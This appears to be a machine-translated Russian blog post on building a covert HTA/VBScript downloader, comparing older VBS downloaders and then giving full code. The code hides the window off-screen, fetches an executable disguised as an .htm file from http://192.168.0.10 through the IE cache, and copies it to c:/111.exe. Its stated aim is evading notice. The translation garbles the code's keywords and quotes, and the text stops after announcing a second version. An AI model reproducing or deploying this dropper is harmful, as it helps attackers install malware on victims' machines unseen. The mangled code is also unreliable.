1. Давайте впервые поговорим о двух относительно новых загрузчиках VBS в этом блоге. Один изготовлен с использованием компонента CDO.Message, а другой изготовлен с использованием microsoft.xmldom. См. Http://www.jb51.net/article/15506.htm. Один из этих двух загрузчиков неприятен в использовании и необходимо заранее конвертировать EXE. Во -вторых, cscript.exe будет получить доступ к сети во время использования, что не слишком скрыто. Во -вторых, некоторые машины не имеют этих двух компонентов и используют adodb.stream, так что есть некоторые недостатки.
2. Давайте поговорим о загрузчике Lake2 http://blog.csdn.net/lake2/archive/2007/05/08/1600580.aspx. Этот загрузчик довольно хорош, но есть проблемы. Одним из них является то, что если будет установлен другой браузер, такой как 360, будет открыто окно IE, а местоположение кеша IE из реестра может быть не точным.
3. Так как мы можем обновить эти дефекты? Есть еще способ. Мы используем HTA, чтобы написать это, что относительно редко. HH.Exe, как правило, будет выпущен при доступе к сети. Сколько трудностей должно быть решено путем написания этого загрузчика:
(1). Make hta invisible------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(2). Сделайте командную строку приема HTA parameters----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------.
(3). Не называйте все компоненты, упомянутые в первом и втором элементе выше----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(4) Временное расположение кеша .ie ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(5) Мы не называем ни одного component------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------.
4. Код (напрямую напишите параметры в HTA)
Код заключается в следующем:
<script language = VBS>
Window.moveto 4000,4000
window.resizeto 0,0 'сделать HTA невидимым
Установить objshell = createObject ("wscript.shell") 'hta может напрямую вызовать wscript.shell, но не может вызвать wscript.createObject ("wscript.shell")
downpath = objshell.expandenvironmentstrings («%userprofile%») и «локальные настройки» «Получить путь загрузки в соответствии с переменной среды
Установите xml = document.createElement ("xml") 'поведение по умолчанию создания элемента XML, т.е.
xml.addbehavior ("#по умолчанию#скачать")
xml.async = 0
xml.load ("http://192.168.0.10/xx.htm") 'Пожалуйста, измените имя EXE на пространство. Если вы загружаете его с помощью программного обеспечения FTP, это может не работать. Лучше просто надеть его.
Showallfile (вниз)
Sub Showallfile (Path) «Путешествие и поиск, напрямую используйте код озера2
Findfilename = "xx [1] .htm" "Это также то, что вам нужно изменить. Если выше - xx.htm, вот xx [1] .htm
Установить fso = createObject ("scripting.filesystemobject")
SET F = FSO.GetFolder (PATH)
Установить fc = f.subfolders
Для каждого F1 в FC
Если fso.fileexists (path & "/" & f1.name & "/" & findfilename) тогда
Fso.copyfile path & "/" & f1.name & "/" & findfilename, "c: /111.exe"
'Document.Write "[+] Скачать успех!"
Конец, если
Showallfile Path & "/" & f1.name
Следующий
Установить FSO = ничего
Конец суб
Window.close
</script>
Использование: поместите Exe, как xx.exe в пространство, затем дважды щелкните по этому HTA.
5. Другой код (параметры командной строки пройти)
Я лично думаю, что код в четвертой части лучше, просто измените его и используйте его. Если параметры командной строки называются, я обнаружил, что окно HTA все еще будет появляться, и оно закроется только после загрузки, так что это не очень хорошо. Код: